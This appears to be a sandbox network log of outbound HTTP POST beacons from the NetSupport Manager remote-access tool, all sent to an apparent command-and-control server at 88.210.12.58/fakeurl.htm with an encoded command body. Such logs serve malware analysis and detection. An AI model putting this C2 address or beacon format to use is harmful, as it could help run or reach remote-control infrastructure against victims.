Dec 10, 2024 08:59:43.109064102 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:43.210016012 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:43.311008930 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:43.411004066 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:43.512121916 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:43.612071991 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:43.712999105 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:43.813047886 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:43.914813042 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:44.015032053 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:44.116051912 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:44.216114998 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:44.316056967 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:44.417026043 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:44.517072916 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:44.618020058 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:44.718130112 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:44.819027901 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:44.919038057 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:45.020039082 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:45.121032000 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:45.222665071 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:45.322024107 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:45.429842949 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:45.532759905 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:45.639414072 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:45.844619989 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:45.946773052 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:46.045042992 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:46.146044016 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:46.246037960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:46.347074986 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:46.448033094 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:46.548111916 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:46.649100065 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:46.750106096 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:46.851131916 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:46.952047110 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:47.052026987 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:47.154771090 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:47.252034903 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:47.353033066 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:47.454824924 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:47.554043055 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:47.654922009 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:47.758768082 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:47.856026888 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:47.957047939 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:48.058142900 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:48.224628925 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:48.327064991 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:48.538028955 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:48.740164995 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:48.841099977 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:48.941143036 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:49.043150902 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:49.146814108 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:49.243262053 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:49.346843958 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:49.444037914 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:49.544207096 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:49.646821022 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:49.746889114 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:49.848771095 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:49.947042942 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:50.047069073 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:50.148097992 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:50.248089075 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:50.349133968 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:50.450063944 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:50.550059080 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:50.651046991 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:50.751092911 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:50.852133036 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:50.977433920 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:51.080826998 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:51.180782080 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:51.395726919 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:51.595058918 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:51.696778059 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:51.797173023 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:51.898044109 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:51.999059916 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:52.100052118 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:52.201215029 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:52.302074909 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:52.402076960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:52.503029108 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:52.603070021 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:52.704068899 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:52.804091930 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:52.905061960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:53.008784056 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
